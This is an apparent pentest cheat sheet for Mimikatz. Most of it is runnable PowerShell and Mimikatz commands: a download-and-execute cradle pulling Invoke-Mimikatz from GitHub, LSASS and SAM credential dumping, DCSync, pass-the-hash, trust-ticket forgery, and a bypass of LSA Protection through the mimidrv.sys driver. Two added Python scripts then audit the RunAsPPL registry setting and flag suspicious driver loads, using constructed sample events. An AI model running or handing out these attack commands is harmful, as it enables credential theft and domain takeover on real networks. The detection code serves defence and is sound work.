# Mimikatz

**URL:** <https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1>

### Dump Credentials

```powershell
# Download and execute in cradle
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')

# Dump creds from memory
Invoke-Mimikatz -DumpCreds

# DCSync Attack
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:moe"'

# Dump local passwords
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'

# Dump Credential Vault
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'

# Dump credentials on remote systems
Invoke-Mimikatz -DumpCreds -ComputerName @("WS01","WS02")
```

### Dump Domain Credentials

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

### Spawn PowerShell (with compromised NTLM hash)

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:DomainAdmin /domain:Security.local /ntlm:b38ff50264b7458734d82c69794a4d8 /run:powershell.exe"'
```

### Forge Inter-domain trust ticket

```powershell
# Obtain trust key between current domain and external domain
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

# An inter-forest TGT can be forged
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:Security.local /sid:S-1-5-21-1874506000-3219952063-538504511 /rc4:815720462a1b48256f16740b70356b7f /service:krbtgt /target:Vault.local /ticket:C:\AD\trust_forest_tkt.kirbi"'
```

### Over pass the hash

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:Security.local /ntlm:<ntlmhash> /run:powershell.exe"'
```

## Protection Bypass

The below image represents an attempt to access the lsass.exe process and extract clear text passwords and run a skeleton key attack. As we can see this has not been successful since applying the registry key change mentioned in the mitigation section for LSA Protection.

![](/files/-Mj5p3IENJCN36wz4OD_)

We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place.

```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL"
# Value 0x1 means LSA Protection is enabled
```
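As an added example (not from the original page), the following Python classifies hosts from the output of that `reg query` command so the check can be run across a fleet and the results gathered in one place. The sample outputs are constructed from the format `reg.exe` prints, and the hostnames are placeholders.

```python
import re

# Added example (not from the original cheat sheet): interpret the output of
#   reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
# so an audit script can classify hosts. All sample outputs below are constructed.

# Matches the value line reg.exe prints, e.g. "    RunAsPPL    REG_DWORD    0x1"
RUNASPPL_RE = re.compile(r"^\s*RunAsPPL\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$", re.MULTILINE)


def lsa_protection_state(reg_query_output):
    """Return 'enabled', 'disabled' or 'not-configured' from reg query text.

    The page notes that 0x1 means LSA Protection is enabled; any non-zero value is
    treated as enabled here, 0 as explicitly disabled, and a missing value (reg.exe
    prints an ERROR line instead of a value line) as not configured.
    """
    m = RUNASPPL_RE.search(reg_query_output)
    if m is None:
        return "not-configured"
    raw = m.group(1)
    value = int(raw, 16) if raw.lower().startswith("0x") else int(raw, 10)
    return "enabled" if value != 0 else "disabled"


def audit(hosts):
    """hosts: {hostname: reg query output}. Returns the hostnames that are NOT protected."""
    return sorted(h for h, out in hosts.items() if lsa_protection_state(out) != "enabled")


# Constructed sample outputs in reg.exe's format (not captured from real hosts).
SAMPLE_ENABLED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    RunAsPPL    REG_DWORD    0x1
"""
SAMPLE_DISABLED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    RunAsPPL    REG_DWORD    0x0
"""
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"

if __name__ == "__main__":
    fleet = {"ws01": SAMPLE_ENABLED, "ws02": SAMPLE_MISSING, "dc01": SAMPLE_DISABLED}  # placeholder hostnames
    print("unprotected hosts:", audit(fleet))
```

Treating "not-configured" as unprotected is deliberate: the registry value is absent by default on most Windows 10 and Server builds, so an absent value means LSASS runs unprotected, not that the check is inconclusive.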

This can be bypassed by utilizing the `mimidrv.sys` driver file which is included as a separate file with mimikatz.

{% hint style="info" %}
The mimidrv.sys driver file needs to exist in the same directory as mimikatz.exe.
{% endhint %}

The driver can be loaded by running the command `!+` in `Mimikatz`. After doing so, the following command can be executed to protect the `mimikatz.exe` process.

```
!processProtect /process:mimikatz.exe
```

The same command with the `/remove` flag can be used to strip the process protection from a process such as `lsass.exe`.

```
!processprotect /process:lsass.exe /remove
```

From here we should be free to perform actions against LSASS and dump credentials from it.

```
mimikatz.exe sekurlsa::logonpasswords
```
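Loading mimidrv.sys with `!+` registers a kernel-driver service and loads a driver image from wherever mimikatz.exe sits, which is exactly what a driver-load baseline catches. The Python below is an added detection example, not part of this page or of Mimikatz: it flags Sysmon Event 6 (DriverLoad) and Security 4697 (service installed) records whose driver path lies outside the normal driver directories or whose signer is not on an allowlist. The trusted directories and signers are assumptions to tune per environment, and all sample records, including the service name and signer string, are constructed.

```python
import ntpath

# Added example (not from the original cheat sheet): flag kernel-driver loads and
# driver-service installs from unexpected locations. Records are dicts mimicking
# Sysmon Event 6 (DriverLoad) and Security 4697 fields; all samples are constructed.

# Directories from which kernel drivers are normally loaded (assumption: tune to your baseline).
TRUSTED_DRIVER_DIRS = (r"c:\windows\system32\drivers", r"c:\windows\system32\driverstore")
# Signers allowed to load kernel code on this fleet (assumption: an allowlist you maintain).
TRUSTED_SIGNERS = {"microsoft windows", "microsoft windows hardware compatibility publisher"}


def _normalize(path):
    """Lower-case and drop the NT '\\??\\' prefix that 4697 ServiceFileName values can carry."""
    path = path.lower()
    return path[4:] if path.startswith("\\??\\") else path


def _in_trusted_dir(path):
    directory = ntpath.dirname(_normalize(path))
    return any(directory == d or directory.startswith(d + "\\") for d in TRUSTED_DRIVER_DIRS)


def suspicious_driver_load(event):
    """Sysmon 6: driver image outside the trusted directories or from a non-allowlisted signer."""
    if event.get("Channel") != "Sysmon" or event.get("EventID") != 6:
        return None
    reasons = []
    if not _in_trusted_dir(event.get("ImageLoaded", "")):
        reasons.append("driver loaded from untrusted directory")
    signer_ok = event.get("Signature", "").lower() in TRUSTED_SIGNERS
    if not signer_ok or event.get("SignatureStatus", "").lower() != "valid":
        reasons.append("signer not on allowlist")
    return reasons or None


def suspicious_service_install(event):
    """Security 4697: a kernel-driver service (ServiceType 0x1) whose binary is outside the driver store."""
    if event.get("Channel") != "Security" or event.get("EventID") != 4697:
        return None
    if str(event.get("ServiceType", "")).lower() != "0x1":
        return None
    if _in_trusted_dir(event.get("ServiceFileName", "")):
        return None
    return ["kernel driver service installed from untrusted directory"]


def triage(events):
    """Return (event_index, driver_basename, reasons) for each suspicious record."""
    findings = []
    for i, ev in enumerate(events):
        reasons = suspicious_driver_load(ev) or suspicious_service_install(ev)
        if reasons:
            path = ev.get("ImageLoaded") or ev.get("ServiceFileName", "")
            findings.append((i, ntpath.basename(_normalize(path)), reasons))
    return findings


SAMPLE_EVENTS = [  # constructed sample records, not real telemetry
    {"Channel": "Sysmon", "EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},                       # benign
    {"Channel": "Security", "EventID": 4697, "ServiceName": "mimidrv", "ServiceType": "0x1",
     "ServiceFileName": r"\??\C:\Users\moe\Downloads\mimidrv.sys"},                      # driver service from a user profile
    {"Channel": "Sysmon", "EventID": 6, "ImageLoaded": r"C:\Users\moe\Downloads\mimidrv.sys",
     "Signature": "Open Source Developer, Benjamin Delpy", "SignatureStatus": "Valid"},   # constructed signer string
]

if __name__ == "__main__":
    for idx, name, reasons in triage(SAMPLE_EVENTS):
        print(f"event[{idx}] {name}: {', '.join(reasons)}")
```

The signer check matters because a validly signed driver still loads on systems without HVCI or a driver blocklist; the location and allowlist rules together catch the case where the signature is real but the publisher is not one you expect to ship kernel code to your hosts.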
